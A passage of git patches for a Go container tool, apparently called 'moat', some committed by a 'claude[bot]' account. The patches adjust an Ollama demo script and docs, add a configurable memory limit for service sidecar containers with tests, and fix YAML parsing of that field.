"$result" | jq -r '.response // (.error | "Error: " + .)' echo diff --git a/examples/service-ollama/moat.yaml b/examples/service-ollama/moat.yaml index 8ffde955..d29806df 100644 --- a/examples/service-ollama/moat.yaml +++ b/examples/service-ollama/moat.yaml @@ -19,6 +19,6 @@ dependencies: services: ollama: models: - - qwen2.5-coder:1.5b + - qwen2.5-coder:0.5b command: ["sh", "/workspace/demo.sh"] From bd98956a1f51e5ae904442353656097f6922f4ad Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 22:18:54 +0000 Subject: [PATCH 24/27] fix(examples): pipe curl directly to jq, avoid shell variable mangling --- examples/service-ollama/demo.sh | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/examples/service-ollama/demo.sh b/examples/service-ollama/demo.sh index 0bd1cc32..c7722541 100644 --- a/examples/service-ollama/demo.sh +++ b/examples/service-ollama/demo.sh @@ -10,8 +10,8 @@ curl -s "$MOAT_OLLAMA_URL/api/tags" echo echo "--- Generating response ---" -result=$(curl -s -H 'Content-Type: application/json' \ +curl -s -H 'Content-Type: application/json' \ "$MOAT_OLLAMA_URL/api/generate" \ - -d '{"model":"qwen2.5-coder:0.5b","prompt":"Write hello world in Go","stream":false}') -echo "$result" | jq -r '.response // (.error | "Error: " + .)' + -d '{"model":"qwen2.5-coder:0.5b","prompt":"Write hello world in Go","stream":false}' \ + | jq -r '.response // ("Error: " + .error)' echo From 503e79c43b9075048e77cd952b32522ec234ae63 Mon Sep 17 00:00:00 2001 From: "claude[bot]" <41898282+claude[bot]@users.noreply.github.com> Date: Tue, 17 Mar 2026 22:22:17 +0000 Subject: [PATCH 25/27] fix(docs): correct ollama version in examples to 0.18.1, pipe api/tags to jq --- docs/content/guides/08-services.md | 2 +- docs/content/reference/02-moat-yaml.md | 2 +- examples/service-ollama/demo.sh | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/docs/content/guides/08-services.md b/docs/content/guides/08-services.md index 0012c44e..2783b134 100644 --- a/docs/content/guides/08-services.md +++ b/docs/content/guides/08-services.md @@ -200,7 +200,7 @@ Ollama provides local model inference without external API keys: ```yaml dependencies: - - ollama@0.9 + - ollama@0.18.1 services: ollama: diff --git a/docs/content/reference/02-moat-yaml.md b/docs/content/reference/02-moat-yaml.md index 7eef34a5..f334d3b6 100644 --- a/docs/content/reference/02-moat-yaml.md +++ b/docs/content/reference/02-moat-yaml.md @@ -266,7 +266,7 @@ dependencies: | `mysql@8` | MySQL 8 | 3306 | | `mysql@9` | MySQL 9 | 3306 | | `redis@7` | Redis 7 | 6379 | -| `ollama@0.9` | Ollama | 11434 | +| `ollama@0.18.1` | Ollama | 11434 | Each service injects `MOAT_*` environment variables into the main container. See [Service environment variables](#service-environment-variables) for the full list. diff --git a/examples/service-ollama/demo.sh b/examples/service-ollama/demo.sh index c7722541..0946b776 100644 --- a/examples/service-ollama/demo.sh +++ b/examples/service-ollama/demo.sh @@ -6,7 +6,7 @@ echo "MOAT_OLLAMA_URL=$MOAT_OLLAMA_URL" echo echo "--- Available models ---" -curl -s "$MOAT_OLLAMA_URL/api/tags" +curl -s "$MOAT_OLLAMA_URL/api/tags" | jq . echo echo "--- Generating response ---" From fd110412e627dd38a063640f8798fa49413cd70e Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 22:34:13 +0000 Subject: [PATCH 26/27] feat(services): add memory limit for service sidecar containers Add a 'memory' field to ServiceSpec so users can configure the memory limit for service sidecar containers (e.g., Ollama) independently of the main agent container's container.memory setting. Wire through ServiceConfig.MemoryMB -> SidecarConfig.MemoryMB, applied as Docker HostConfig.Resources.Memory and Apple --memory flag. Update the Ollama example to use memory: 2048 with qwen2.5-coder:1.5b. --- docs/content/reference/02-moat-yaml.md | 4 +++ examples/service-ollama/demo.sh | 2 +- examples/service-ollama/moat.yaml | 3 ++- internal/config/config.go | 7 +++--- internal/container/apple_service.go | 4 +++ internal/container/apple_service_test.go | 31 ++++++++++++++++++++++++ internal/container/docker.go | 3 +++ internal/container/docker_service.go | 1 + internal/container/runtime.go | 5 ++++ internal/run/services.go | 6 +++++ internal/run/services_test.go | 16 ++++++++++++ 11 files changed, 77 insertions(+), 5 deletions(-) diff --git a/docs/content/reference/02-moat-yaml.md b/docs/content/reference/02-moat-yaml.md index f334d3b6..39eea67e 100644 --- a/docs/content/reference/02-moat-yaml.md +++ b/docs/content/reference/02-moat-yaml.md @@ -869,10 +869,13 @@ Each key matches a service name from `dependencies:` (e.g., `postgres`, `mysql`, |-------|------|---------|-------------| | `env` | `map[string]string` | `{}` | Environment variables for the service container. Supports secret references. | | `image` | `string` | (auto) | Override default image (Docker runtime only) | +| `memory` | `integer` | (runtime default) | Memory limit for the service container in MB. Useful for memory-intensive services like Ollama. | | `wait` | `boolean` | `true` | Block main container start until service is ready | Setting `wait: false` starts the main container without waiting for the service health check to pass. +`memory` sets the limit for the service sidecar container, independent of `container.memory` (which limits the main agent container). + ### Service-specific lists Some services accept additional list configuration beyond `env` and `wait`. These keys are defined by the service's registry entry: @@ -886,6 +889,7 @@ Example: ```yaml services: ollama: + memory: 4096 # 4 GB — size to match your largest model models: - qwen2.5-coder:7b - nomic-embed-text diff --git a/examples/service-ollama/demo.sh b/examples/service-ollama/demo.sh index 0946b776..c8d30520 100644 --- a/examples/service-ollama/demo.sh +++ b/examples/service-ollama/demo.sh @@ -12,6 +12,6 @@ echo echo "--- Generating response ---" curl -s -H 'Content-Type: application/json' \ "$MOAT_OLLAMA_URL/api/generate" \ - -d '{"model":"qwen2.5-coder:0.5b","prompt":"Write hello world in Go","stream":false}' \ + -d '{"model":"qwen2.5-coder:1.5b","prompt":"Write hello world in Go","stream":false}' \ | jq -r '.response // ("Error: " + .error)' echo diff --git a/examples/service-ollama/moat.yaml b/examples/service-ollama/moat.yaml index d29806df..52ec5421 100644 --- a/examples/service-ollama/moat.yaml +++ b/examples/service-ollama/moat.yaml @@ -18,7 +18,8 @@ dependencies: services: ollama: + memory: 2048 models: - - qwen2.5-coder:0.5b + - qwen2.5-coder:1.5b command: ["sh", "/workspace/demo.sh"] diff --git a/internal/config/config.go b/internal/config/config.go index ec1af7ec..ccce5ebc 100644 --- a/internal/config/config.go +++ b/internal/config/config.go @@ -149,9 +149,10 @@ type MCPAuthConfig struct { // ServiceSpec allows customizing service behavior. type ServiceSpec struct { - Env map[string]string `yaml:"env,omitempty"` - Image string `yaml:"image,omitempty"` - Wait *bool `yaml:"wait,omitempty"` + Env map[string]string `yaml:"env,omitempty"` + Image string `yaml:"image,omitempty"` + Wait *bool `yaml:"wait,omitempty"` + Memory int `yaml:"memory,omitempty"` // Memory limit in MB for the service container (0 = runtime default) // Extra holds unknown list-valued keys (e.g., "models" for ollama). // Populated by UnmarshalYAML. The run layer maps these to provisions // using the registry's provisions_key. diff --git a/internal/container/apple_service.go b/internal/container/apple_service.go index b92d5e0a..cb21d85f 100644 --- a/internal/container/apple_service.go +++ b/internal/container/apple_service.go @@ -153,6 +153,10 @@ func buildAppleRunArgs(cfg ServiceConfig, networkID string) []string { args = append(args, "--network", networkID) } + if cfg.MemoryMB > 0 { + args = append(args, "--memory", fmt.Sprintf("%dMB", cfg.MemoryMB)) + } + // Add cache mount if configured if cfg.CachePath != "" && cfg.CacheHostPath != "" { args = append(args, "--volume", cfg.CacheHostPath+":"+cfg.CachePath) diff --git a/internal/container/apple_service_test.go b/internal/container/apple_service_test.go index 2149bbb9..01404fae 100644 --- a/internal/container/apple_service_test.go +++ b/internal/container/apple_service_test.go @@ -115,6 +115,37 @@ func TestGetContainerIPExists(t *testing.T) { assert.Error(t, err) } +func TestAppleBuildRunArgsWithMemory(t *testing.T) { + cfg := ServiceConfig{ + Name: "ollama", + Version: "0.18.1", + Image: "ollama/ollama", + Env: map[string]string{}, + MemoryMB: 2048, + } + + args := buildAppleRunArgs(cfg, "") + for i, a := range args { + if a == "--memory" && i+1 < len(args) { + assert.Equal(t, "2048MB", args[i+1]) + return + } + } + t.Fatal("--memory flag not found in args") +} + +func TestAppleBuildRunArgsNoMemoryByDefault(t *testing.T) { + cfg := ServiceConfig{ + Name: "ollama", + Version: "0.18.1", + Image: "ollama/ollama", + Env: map[string]string{}, + } + + args := buildAppleRunArgs(cfg, "") + assert.NotContains(t, args, "--memory") +} + func TestAppleBuildRunArgsWithCachePath(t *testing.T) { cfg := ServiceConfig{ Name: "ollama", diff --git a/internal/container/docker.go b/internal/container/docker.go index e4be6ab1..ff9ca741 100644 --- a/internal/container/docker.go +++ b/internal/container/docker.go @@ -976,6 +976,9 @@ func (m *dockerSidecarManager) StartSidecar(ctx context.Context, cfg SidecarConf NetworkMode: container.NetworkMode(cfg.NetworkID), Privileged: cfg.Privileged, Mounts: mounts, + Resources: container.Resources{ + Memory: int64(cfg.MemoryMB) * 1024 * 1024, // 0 means no limit + }, }, &network.NetworkingConfig{ EndpointsConfig: map[string]*network.EndpointSettings{ diff --git a/internal/container/docker_service.go b/internal/container/docker_service.go index c926dd62..ed692831 100644 --- a/internal/container/docker_service.go +++ b/internal/container/docker_service.go @@ -170,6 +170,7 @@ func buildSidecarConfig(cfg ServiceConfig, networkID string) SidecarConfig { NetworkID: networkID, RunID: cfg.RunID, Env: envList, + MemoryMB: cfg.MemoryMB, Labels: map[string]string{ "moat.role": "service", }, diff --git a/internal/container/runtime.go b/internal/container/runtime.go index 9337df93..d0323117 100644 --- a/internal/container/runtime.go +++ b/internal/container/runtime.go @@ -232,6 +232,8 @@ type ServiceConfig struct { Provisions []string // ProvisionCmd is the command template with {item} placeholder. ProvisionCmd string + // MemoryMB is the memory limit for the service container in megabytes (0 = runtime default). + MemoryMB int } // ServiceInfo contains connection details for a started service. @@ -337,6 +339,9 @@ type SidecarConfig struct { // Labels are container labels (merged with defaults) Labels map[string]string + + // MemoryMB is the memory limit for the container in megabytes (0 = no limit). + MemoryMB int } // MountConfig describes a volume mount (bind mount from host to container). diff --git a/internal/run/services.go b/internal/run/services.go index b268dc13..3723283f 100644 --- a/internal/run/services.go +++ b/internal/run/services.go @@ -224,6 +224,11 @@ func buildServiceConfig(dep deps.Dependency, runID string, userSpec *config.Serv cacheHostPath = filepath.Join(homeDir, ".moat", "cache", dep.Name) } + var memoryMB int + if userSpec != nil { + memoryMB = userSpec.Memory + } + return container.ServiceConfig{ Name: dep.Name, Version: dep.Version, @@ -238,6 +243,7 @@ func buildServiceConfig(dep deps.Dependency, runID string, userSpec *config.Serv CacheHostPath: cacheHostPath, Provisions: provisions, ProvisionCmd: spec.Service.ProvisionCmd, + MemoryMB: memoryMB, }, nil } diff --git a/internal/run/services_test.go b/internal/run/services_test.go index d0870e7c..94310d51 100644 --- a/internal/run/services_test.go +++ b/internal/run/services_test.go @@ -179,6 +179,22 @@ func TestBuildServiceConfigOllamaNoModels(t *testing.T) { assert.Equal(t, "ollama pull {item}", cfg.ProvisionCmd) } +func TestBuildServiceConfigMemory(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.18.1", Type: deps.TypeService} + + cfg, err := buildServiceConfig(dep, "run-test", &config.ServiceSpec{Memory: 2048}) + require.NoError(t, err) + assert.Equal(t, 2048, cfg.MemoryMB) +} + +func TestBuildServiceConfigMemoryDefault(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.18.1", Type: deps.TypeService} + + cfg, err := buildServiceConfig(dep, "run-test", nil) + require.NoError(t, err) + assert.Equal(t, 0, cfg.MemoryMB, "zero means runtime default") +} + func TestBuildServiceConfigNoPasswordForNoAuth(t *testing.T) { dep := deps.Dependency{Name: "ollama", Version: "0.18.1", Type: deps.TypeService} From db2d1f12f03b7e3280a961f469bebd1d9d7e155c Mon Sep 17 00:00:00 2001 From: "claude[bot]" <41898282+claude[bot]@users.noreply.github.com> Date: Tue, 17 Mar 2026 22:38:11 +0000 Subject: [PATCH 27/27] fix(config): add memory to known fields in ServiceSpec UnmarshalYAML The known map used to skip processing of parsed struct fields was missing "memory", causing memory: values to leak into Extra as nil. This caused buildServiceConfig to reject memory: as an unknown key when combined with provision-capable services (e.g. ollama). The example moat.yaml, which uses both memory: 2048 and models: [...], would fail at runtime. Also adds a test that exercises YAML with both memory: and models: to prevent regression. --- internal/config/config.go | 2 +- internal/config/config_test.go | 17 +++++++++++++++++ 2 files changed, 18 insertions(+), 1 deletion(-) diff --git a/internal/config/config.go b/internal/config/config.go index ccce5ebc..cbe4766d 100644 --- a/internal/config/config.go +++ b/internal/config/config.go @@ -172,7 +172,7 @@ func (s *ServiceSpec) UnmarshalYAML(value *yaml.Node) error { if value.Kind != yaml.MappingNode { return nil } - known := map[string]bool{"env": true, "image": true, "wait": true} + known := map[string]bool{"env": true, "image": true, "wait": true, "memory": true} for i := 0; i+1 < len(value.Content); i += 2 { key := value.Content[i].Value val := value.Content[i+1] diff --git a/internal/config/config_test.go b/internal/config/config_test.go index f89eda88..00844e4d 100644 --- a/internal/config/config_test.go +++ b/internal/config/config_test.go @@ -2350,3 +2350,20 @@ typo_key: some_value assert.Contains(t, spec.Extra, "typo_key") assert.Nil(t, spec.Extra["typo_key"]) } + +func TestServiceSpecUnmarshalMemoryNotLeakedToExtra(t *testing.T) { + // memory: is a known ServiceSpec field — it must not leak into Extra. + // If it did, buildServiceConfig would reject it as an unknown key when + // combined with a provisions-capable service like ollama. + input := ` +memory: 2048 +models: + - qwen2.5-coder:1.5b +` + var spec ServiceSpec + err := yaml.Unmarshal([]byte(input), &spec) + require.NoError(t, err) + assert.Equal(t, 2048, spec.Memory) + assert.NotContains(t, spec.Extra, "memory", "memory must not appear in Extra") + assert.Equal(t, []string{"qwen2.5-coder:1.5b"}, spec.Extra["models"]) +}